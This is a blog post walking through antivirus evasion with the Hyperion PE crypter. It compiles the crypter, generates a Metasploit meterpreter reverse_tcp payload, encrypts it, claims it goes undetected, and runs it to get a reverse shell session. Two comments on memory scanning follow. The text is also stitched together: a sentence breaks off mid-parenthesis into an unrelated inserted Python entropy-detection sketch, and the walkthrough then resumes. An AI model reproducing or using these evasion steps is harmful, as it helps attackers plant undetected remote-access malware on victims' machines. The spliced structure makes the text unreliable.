Bypassing Antivirus with PE Crypters

Well, most of the time when we do a penetration test, we face a super cool AV protection which stops us from executing our lovely EXEs, shellcodes, etc.

I was looking around for the same, and from a presentation by Mr. Dave Kennedy at DerbyCon I got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging here and there, I found that shellcodexec is a small utility to inject a shellcode into any process and thus execute your malicious intentions. The approach is that when there is no file at all, what signature will AVs match? However, shellcodexec is itself getting caught nowadays and therefore I will not suggest you go for it.

On the other hand, PE Crypters (from the Nullsecurity team) will encrypt a binary file with a sexy crypting approach and thus can be used to bypass the AV. The whole project is running under the name of the HYPERION project and is a proper working way to mess around with AVs. So let's start.

Well, AVs have become good at detecting the templates with which we encrypt our EXE, and since the program has to decrypt itself to reach the actual offset, AVs started following the same decryption approach, with the result of "Detection". In this PE crypter, the payload is not scrambled; instead it is encapsulated. A different key is used for the cipher every time, and at the time of execution the key is recovered by brute force. So it will take time, huh? Well yeah, it will take time if our key is long. We will keep our key short and everything will go fine. This is what the Hyperion PE crypter does, in short: a weak 128 bit AES key is used to encapsulate the packet, which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (
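Because the payload is encapsulated in AES ciphertext, a signature scan of the file sees only random-looking bytes, but that randomness is itself measurable. The following added example (not from the original post or the Hyperion project) is a defender-side triage sketch that flags high-entropy regions in a byte buffer; the sample buffer, window size and threshold are assumptions constructed for illustration.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for constant data, up to 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return sum(c / n * math.log2(n / c) for c in Counter(data).values())


def high_entropy_regions(blob: bytes, window: int = 1024, threshold: float = 7.5):
    """Return merged (start, end) offsets of aligned windows at or above threshold."""
    regions = []
    for off in range(0, len(blob) - window + 1, window):
        if shannon_entropy(blob[off:off + window]) < threshold:
            continue
        if regions and regions[-1][1] == off:
            regions[-1] = (regions[-1][0], off + window)  # extend the previous hit
        else:
            regions.append((off, off + window))
    return regions


def build_sample() -> bytes:
    """Constructed stand-in for a crypted file: plain stub + ciphertext-like blob + padding."""
    stub = b"\x55\x8b\xec\x83\xec\x10\x90\x90" * 256  # 2048 repetitive bytes
    # SHA-256 counter output stands in for AES ciphertext (statistically similar).
    blob = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(128))
    return stub + blob + b"\x00" * 1024


SAMPLE = build_sample()

if __name__ == "__main__":
    for start, end in high_entropy_regions(SAMPLE):
        ent = shannon_entropy(SAMPLE[start:end])
        print(f"high-entropy region 0x{start:x}-0x{end:x}: {ent:.2f} bits/byte")
```

High entropy also shows up in compressed resources and legitimate packers, so a hit is a reason to look closer at the file rather than a verdict on it.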

Anyways, for super cool guys, this was enough. But as only the source files are available by now, that can be a little troublesome for those who are new to these things :P. Well, let me give a walkthrough. First of all choose your platform; I'm preferring Linux all the way, but it's your system, and your choice too.

Next, download the project;
or use: wget

Unzip it.

Change the directory, and compile it.
wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe

Once you have created the executable for crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for a reverse connection and, once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > msf1.exe

Scan it. 
Once the payload is ready, we will scan it first (without crypting).

Let's Crypt it with Hyperion.
wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe
ls -l

Scan it.
No Detection

Execute it.
As soon as you execute it, it will start brute forcing, which will make the CPU usage 100%.

Enjoy It.
As soon as the brute force is over, CPU usage will reduce to normal and a session will get generated.

I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)


  1. Wouldn't AV which scan memory detect the exploit?

  2. Yeah, those AVs who perform scans on memory will detect it just because of an Anomaly behaviour.

    Apart from that it will bypass signature based AVs easily.
